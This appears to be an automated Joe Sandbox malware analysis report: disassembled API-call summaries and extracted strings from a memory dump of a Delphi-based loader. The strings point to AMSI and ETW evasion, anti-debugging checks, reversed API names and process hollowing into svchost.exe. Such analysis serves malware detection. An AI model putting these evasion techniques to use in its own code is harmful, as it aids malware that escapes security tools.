                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02DB5AEE
                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02DB5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02DB5B37
                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,02DB5CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02DB5B7D,?,80000001), ref: 02DB5B55
                                                                                                                                      • RegCloseKey.ADVAPI32(?,02DB5B84,00000000,00000000,00000005,00000000,02DB5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02DB5B77
                                                                                                                                      • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02DB5B94
                                                                                                                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 02DB5BA1
                                                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 02DB5BA7
                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 02DB5BD2
                                                                                                                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02DB5C19
                                                                                                                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02DB5C29
                                                                                                                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02DB5C51
                                                                                                                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02DB5C61
                                                                                                                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02DB5C87
                                                                                                                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02DB5C97
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                      • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                      • API String ID: 1759228003-3917250287
                                                                                                                                      • Opcode ID: 157c2bd4115408b97e0aa89cf95af42225febeb023ab7015406033b4d1de4b1f
                                                                                                                                      • Instruction ID: 6b455db6f387070558dbf4817e578a908255bf3db8132546e347ffad435e881a
                                                                                                                                      • Opcode Fuzzy Hash: 157c2bd4115408b97e0aa89cf95af42225febeb023ab7015406033b4d1de4b1f
                                                                                                                                      • Instruction Fuzzy Hash: DF514271E4020CBEFB26D6A4AC66FEE77AD9F04744F8041A1A606E6281D774DE44CFA4

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02DC8020: GetModuleHandleA.KERNELBASE(?), ref: 02DC8072
                                                                                                                                        • Part of subcall function 02DC80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC811B
                                                                                                                                        • Part of subcall function 02DC80C8: GetProcAddress.KERNEL32(?,?), ref: 02DC812D
                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DC7A27
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$AllocateHandleMemoryModuleVirtual
                                                                                                                                      • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                      • API String ID: 1888340430-445027087
                                                                                                                                      • Opcode ID: b28aca1057c07091f90fd92693f3d4763abb5e56128c0a211b6375fa09902ec9
                                                                                                                                      • Instruction ID: 161482f123ef9bacaf355a129ed88de9153458b7628aeb5033515020d041f73f
                                                                                                                                      • Opcode Fuzzy Hash: b28aca1057c07091f90fd92693f3d4763abb5e56128c0a211b6375fa09902ec9
                                                                                                                                      • Instruction Fuzzy Hash: 8A110C75644209AFEB01EFA4DC51E9EB7EDEB4C710FA18868B505D7B40D670AE148F70

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02DC8020: GetModuleHandleA.KERNELBASE(?), ref: 02DC8072
                                                                                                                                        • Part of subcall function 02DC80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC811B
                                                                                                                                        • Part of subcall function 02DC80C8: GetProcAddress.KERNEL32(?,?), ref: 02DC812D
                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DC7A27
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$AllocateHandleMemoryModuleVirtual
                                                                                                                                      • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                      • API String ID: 1888340430-445027087
                                                                                                                                      • Opcode ID: 958b2cd2b49dc2b0246e0019ca691f39baabd24fa5d7b3484ed05b4371f510ae
                                                                                                                                      • Instruction ID: 475398cd9283b9194c40fc8be09373b9bceb1a73c670f40c78e1cf7c9be4eb34
                                                                                                                                      • Opcode Fuzzy Hash: 958b2cd2b49dc2b0246e0019ca691f39baabd24fa5d7b3484ed05b4371f510ae
                                                                                                                                      • Instruction Fuzzy Hash: EC111E75644209AFEB01EF94DC51E9EB7EDEB4C710FA18868B505D7B40D670AE148F70

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02DC8020: GetModuleHandleA.KERNELBASE(?), ref: 02DC8072
                                                                                                                                        • Part of subcall function 02DC80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC811B
                                                                                                                                        • Part of subcall function 02DC80C8: GetProcAddress.KERNEL32(?,?), ref: 02DC812D
                                                                                                                                      • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC82C5
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$HandleMemoryModuleReadVirtual
                                                                                                                                      • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                                      • API String ID: 36784810-737317276
                                                                                                                                      • Opcode ID: bc302a97aa87c0010077c86eafc62b567acc15d8241218e4261ae4a100dfcc91
                                                                                                                                      • Instruction ID: 74cc5bc89f83d7096e5bfdaeed5cc4e05512e85437c726b0793473b9050407f0
                                                                                                                                      • Opcode Fuzzy Hash: bc302a97aa87c0010077c86eafc62b567acc15d8241218e4261ae4a100dfcc91
                                                                                                                                      • Instruction Fuzzy Hash: D5018074640209AFEB02EFA4D861E9EB7EEEB4C710F618464F505D7B04D630AD109F34
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02DC8020: GetModuleHandleA.KERNELBASE(?), ref: 02DC8072
                                                                                                                                        • Part of subcall function 02DC80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC811B
                                                                                                                                        • Part of subcall function 02DC80C8: GetProcAddress.KERNEL32(?,?), ref: 02DC812D
                                                                                                                                      • NtUnmapViewOfSection.NTDLL(?,?), ref: 02DC8529
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$HandleModuleSectionUnmapView
                                                                                                                                      • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                                      • API String ID: 858119152-2520021413
                                                                                                                                      • Opcode ID: e03a8157d7cf6e2d44da2a6889a230446f24763af3f3aff353edd4a406b22e71
                                                                                                                                      • Instruction ID: 94c1fbc00f42b5d7a9c6c4cd7a96193159f40b353895935aa10079119d748620
                                                                                                                                      • Opcode Fuzzy Hash: e03a8157d7cf6e2d44da2a6889a230446f24763af3f3aff353edd4a406b22e71
                                                                                                                                      • Instruction Fuzzy Hash: CE017174650205AFEB02EFA4E861E9EB7AEEB49710FA24864F505D7B00CA70AD109A20
                                                                                                                                      APIs
                                                                                                                                      • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02DCDB0B
                                                                                                                                      • NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02DCDB72
                                                                                                                                      • NtClose.NTDLL(?), ref: 02DCDB7B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Path$CloseFileNameName_Write
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1792072161-0
                                                                                                                                      • Opcode ID: 022564346358c1b875911bf97068e008131d56f5c8cb2a1b2e05ee06248b85ed
                                                                                                                                      • Instruction ID: 1483ca765337ff610241d432da6c74234c024bdbaa294203d3a58523242d8d23
                                                                                                                                      • Opcode Fuzzy Hash: 022564346358c1b875911bf97068e008131d56f5c8cb2a1b2e05ee06248b85ed
                                                                                                                                      • Instruction Fuzzy Hash: A921F171A40309BAEB11EAD4CD56FDEB7BEEF04B00F614065B605F72C1D7B06E048A65
                                                                                                                                      APIs
                                                                                                                                      • RtlInitUnicodeString.NTDLL ref: 02DCDA6C
                                                                                                                                      • RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02DCDA82
                                                                                                                                      • NtDeleteFile.NTDLL(?), ref: 02DCDAA1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Path$DeleteFileInitNameName_StringUnicode
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1459852867-0
                                                                                                                                      • Opcode ID: 537c01e9aa588318e5261210d13c39076c4d128f16d3ee6753b8240ffc6698c8
                                                                                                                                      • Instruction ID: 57cc698666be975e0c56544d63f0ac194a4d62b18a572b121752bf496810ba2b
                                                                                                                                      • Opcode Fuzzy Hash: 537c01e9aa588318e5261210d13c39076c4d128f16d3ee6753b8240ffc6698c8
                                                                                                                                      • Instruction Fuzzy Hash: 59014F7590C249BEEB05E6A08D51BCD77BAEB54704F6100AA9201F7282DB74AF048B35
                                                                                                                                      APIs
                                                                                                                                      • RtlInitUnicodeString.NTDLL ref: 02DCDA6C
                                                                                                                                      • RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02DCDA82
                                                                                                                                      • NtDeleteFile.NTDLL(?), ref: 02DCDAA1
                                                                                                                                        • Part of subcall function 02DB4C0C: SysFreeString.OLEAUT32(?), ref: 02DB4C1A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: PathString$DeleteFileFreeInitNameName_Unicode
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2256775434-0
                                                                                                                                      • Opcode ID: 359baa95bbab30d392699d89435aed60c85a33062d5f5c8eb069daadc38e9885
                                                                                                                                      • Instruction ID: fdad6b2058f45d4c3a1bdc10f0a4c848ccc12b7014e88afa18ad26d0443c0e85
                                                                                                                                      • Opcode Fuzzy Hash: 359baa95bbab30d392699d89435aed60c85a33062d5f5c8eb069daadc38e9885
                                                                                                                                      • Instruction Fuzzy Hash: 4301E175908209BADB11EAE0DD51FCEB7BEEB48700F604475A501F3281EB74AF048A74
                                                                                                                                      APIs
                                                                                                                                      • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02DCDBEB
                                                                                                                                      • NtClose.NTDLL(?), ref: 02DCDC65
                                                                                                                                        • Part of subcall function 02DB4C0C: SysFreeString.OLEAUT32(?), ref: 02DB4C1A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Path$CloseFreeNameName_String
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 11680810-0
                                                                                                                                      • Opcode ID: 1f0eaebba184a9786b8fa2d09876a8d9173df8b4e28c3a09612060b733e99da3
                                                                                                                                      • Instruction ID: 1cda7434a97ea35b76cc9c5e2623bf6ef2966c286cd5e63afd334cd8bc3bc727
                                                                                                                                      • Opcode Fuzzy Hash: 1f0eaebba184a9786b8fa2d09876a8d9173df8b4e28c3a09612060b733e99da3
                                                                                                                                      • Instruction Fuzzy Hash: CC21E271650309BAEB11EAD4CC56FDF77BDEF08700F500565B601F7281DAB4AD058B65
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02DC8824: FreeLibrary.KERNEL32(02E11384,00000000,02E11388,Function_000055D8,00000004,02E11398,02E11388,05F5E0FF,00000040,02E1139C,02E11384,00000000,00000000,00000000,00000000,02DC890B), ref: 02DC88EB
                                                                                                                                        • Part of subcall function 02DCEB94: GetModuleHandleW.KERNEL32(KernelBase,?,02DCEF98,UacInitialize,02E0CE80,02DDAFD8,OpenSession,02E0CE80,02DDAFD8,ScanBuffer,02E0CE80,02DDAFD8,ScanString,02E0CE80,02DDAFD8,Initialize), ref: 02DCEB9A
                                                                                                                                        • Part of subcall function 02DCEB94: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02DCEBAC
                                                                                                                                        • Part of subcall function 02DCEBF0: GetModuleHandleW.KERNEL32(KernelBase), ref: 02DCEC00
                                                                                                                                        • Part of subcall function 02DCEBF0: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02DCEC12
                                                                                                                                        • Part of subcall function 02DCEBF0: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02DCEC29
                                                                                                                                        • Part of subcall function 02DBC2EC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02F058C8,?,02DCFBFE,ScanBuffer,02E0CE80,02DDAFD8,OpenSession,02E0CE80,02DDAFD8,ScanBuffer,02E0CE80,02DDAFD8,OpenSession), ref: 02DBC303
                                                                                                                                        • Part of subcall function 02DCDBB0: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02DCDBEB
                                                                                                                                        • Part of subcall function 02DCDBB0: NtClose.NTDLL(?), ref: 02DCDC65
                                                                                                                                        • Part of subcall function 02DB7E3C: GetFileAttributesA.KERNEL32(00000000,?,02DD2A49,ScanString,02E0CE80,02DDAFD8,OpenSession,02E0CE80,02DDAFD8,ScanBuffer,02E0CE80,02DDAFD8,OpenSession,02E0CE80,02DDAFD8,Initialize), ref: 02DB7E47
                                                                                                                                        • Part of subcall function 02DCDACC: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02DCDB0B
                                                                                                                                        • Part of subcall function 02DCDACC: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02DCDB72
                                                                                                                                        • Part of subcall function 02DCDACC: NtClose.NTDLL(?), ref: 02DCDB7B
                                                                                                                                        • Part of subcall function 02DC87A0: LoadLibraryW.KERNEL32(?,?), ref: 02DC87B4
                                                                                                                                        • Part of subcall function 02DC87A0: GetProcAddress.KERNEL32(02E11390,BCryptVerifySignature), ref: 02DC87CE
                                                                                                                                        • Part of subcall function 02DC87A0: FreeLibrary.KERNEL32(02E11390,02E11390,BCryptVerifySignature,bcrypt,?,02E113D0,00000000,02E113A4,02DCA3C7,ScanString,02E113A4,02DCA77C,ScanBuffer,02E113A4,02DCA77C,Initialize), ref: 02DC880A
                                                                                                                                        • Part of subcall function 02DC870C: LoadLibraryW.KERNEL32(amsi), ref: 02DC8715
                                                                                                                                        • Part of subcall function 02DC870C: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02DC8774
                                                                                                                                      • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02E0CE80,02DDAFD8,OpenSession,02E0CE80,02DDAFD8,ScanBuffer,02E0CE80,02DDAFD8,OpenSession,02E0CE80,02DDAFD8,02DDB330), ref: 02DD49B7
                                                                                                                                        • Part of subcall function 02DCDA44: RtlInitUnicodeString.NTDLL ref: 02DCDA6C
                                                                                                                                        • Part of subcall function 02DCDA44: RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02DCDA82
                                                                                                                                        • Part of subcall function 02DCDA44: NtDeleteFile.NTDLL(?), ref: 02DCDAA1
                                                                                                                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 02DD4BB7
                                                                                                                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 02DD4C0D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FilePath$Library$Name$AddressFreeModuleName_Proc$CloseHandleLoadMove$AttributesCheckDebuggerDeleteInitPresentRemoteSleepStringUnicodeWrite
                                                                                                                                      • String ID: .url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                                                                                                      • API String ID: 3134816315-2905671141
                                                                                                                                      • Opcode ID: 8744bc6fa80dca7c2cc95331a625fcc7643a7b684740bfc930f2eddcac0213eb
                                                                                                                                      • Instruction ID: ee467fa2b80b05ffa083fb700a1eb183257ec8899d5d0fbfa7515604f6daa4f7
                                                                                                                                      • Opcode Fuzzy Hash: 8744bc6fa80dca7c2cc95331a625fcc7643a7b684740bfc930f2eddcac0213eb
                                                                                                                                      • Instruction Fuzzy Hash: 2B242E75A40559CBDF12EB64DCA0ADD73B6FF89300F6044E6E00AA7355DA31AE86CF60

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02DC8824: FreeLibrary.KERNEL32(02E11384,00000000,02E11388,Function_000055D8,00000004,02E11398,02E11388,05F5E0FF,00000040,02E1139C,02E11384,00000000,00000000,00000000,00000000,02DC890B), ref: 02DC88EB
                                                                                                                                      • CreateProcessAsUserW.ADVAPI32(02F057D8,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02F057DC,02F05820,OpenSession,02E0CE80,02DDAFD8,UacScan,02E0CE80), ref: 02DD7E39
                                                                                                                                      • ResumeThread.KERNEL32(02F05824,ScanBuffer,02E0CE80,02DDAFD8,OpenSession,02E0CE80,02DDAFD8,UacScan,02E0CE80,02DDAFD8,ScanBuffer,02E0CE80,02DDAFD8,OpenSession,02E0CE80,02DDAFD8), ref: 02DD8483
                                                                                                                                      • CloseHandle.KERNEL32(02F05820,ScanBuffer,02E0CE80,02DDAFD8,OpenSession,02E0CE80,02DDAFD8,UacScan,02E0CE80,02DDAFD8,02F05824,ScanBuffer,02E0CE80,02DDAFD8,OpenSession,02E0CE80), ref: 02DD8602
                                                                                                                                        • Part of subcall function 02DC87A0: LoadLibraryW.KERNEL32(?,?), ref: 02DC87B4
                                                                                                                                        • Part of subcall function 02DC87A0: GetProcAddress.KERNEL32(02E11390,BCryptVerifySignature), ref: 02DC87CE
                                                                                                                                        • Part of subcall function 02DC87A0: FreeLibrary.KERNEL32(02E11390,02E11390,BCryptVerifySignature,bcrypt,?,02E113D0,00000000,02E113A4,02DCA3C7,ScanString,02E113A4,02DCA77C,ScanBuffer,02E113A4,02DCA77C,Initialize), ref: 02DC880A
                                                                                                                                      • CloseHandle.KERNEL32(02F05820,02F05820,ScanBuffer,02E0CE80,02DDAFD8,UacInitialize,02E0CE80,02DDAFD8,ScanBuffer,02E0CE80,02DDAFD8,OpenSession,02E0CE80,02DDAFD8,UacScan,02E0CE80), ref: 02DD89F4
                                                                                                                                        • Part of subcall function 02DCDACC: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02DCDB0B
                                                                                                                                        • Part of subcall function 02DCDACC: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02DCDB72
                                                                                                                                        • Part of subcall function 02DCDACC: NtClose.NTDLL(?), ref: 02DCDB7B
                                                                                                                                        • Part of subcall function 02DC818C: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02DC8216), ref: 02DC81F8
                                                                                                                                      • ExitProcess.KERNEL32(00000000,OpenSession,02E0CE80,02DDAFD8,ScanBuffer,02E0CE80,02DDAFD8,Initialize,02E0CE80,02DDAFD8,00000000,00000000,00000000,ScanString,02E0CE80,02DDAFD8), ref: 02DDAA25
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseLibrary$FreeHandlePathProcess$AddressCacheCreateExitFileFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                                                                      • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                      • API String ID: 376050052-1225450241
                                                                                                                                      • Opcode ID: d7f7e2aab98d62c24dd219a65365e94d45fd3f6989bff3d0145db98c8df30b4a
                                                                                                                                      • Instruction ID: 72caa14c5d586906247aafc2d04bc1ed1ff837b24eeda661c5fd743d60ed496f
                                                                                                                                      • Opcode Fuzzy Hash: d7f7e2aab98d62c24dd219a65365e94d45fd3f6989bff3d0145db98c8df30b4a
                                                                                                                                      • Instruction Fuzzy Hash: 4F432F75A40558CBCF12EB64DDA09DEB3B6FF88304F6044E6E00AE7755DA319E868F60

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 02DB17D0
                                                                                                                                      • Sleep.KERNEL32(0000000A,00000000), ref: 02DB17E6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                      • Opcode ID: 93dd8b1147b81eb26ffd6abc01c4cdefdc8ab14c245915b85b85c3b8a0092b87
                                                                                                                                      • Instruction ID: 148744882981c3f804f5590f8be72e44315ae163ba06113d4216621c7d52b6f2
                                                                                                                                      • Opcode Fuzzy Hash: 93dd8b1147b81eb26ffd6abc01c4cdefdc8ab14c245915b85b85c3b8a0092b87
                                                                                                                                      • Instruction Fuzzy Hash: 3EB11276A40351CBDB168F29D4E0395BBE1EF85310F1C8ABDD55A8B388C771E892CB90

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
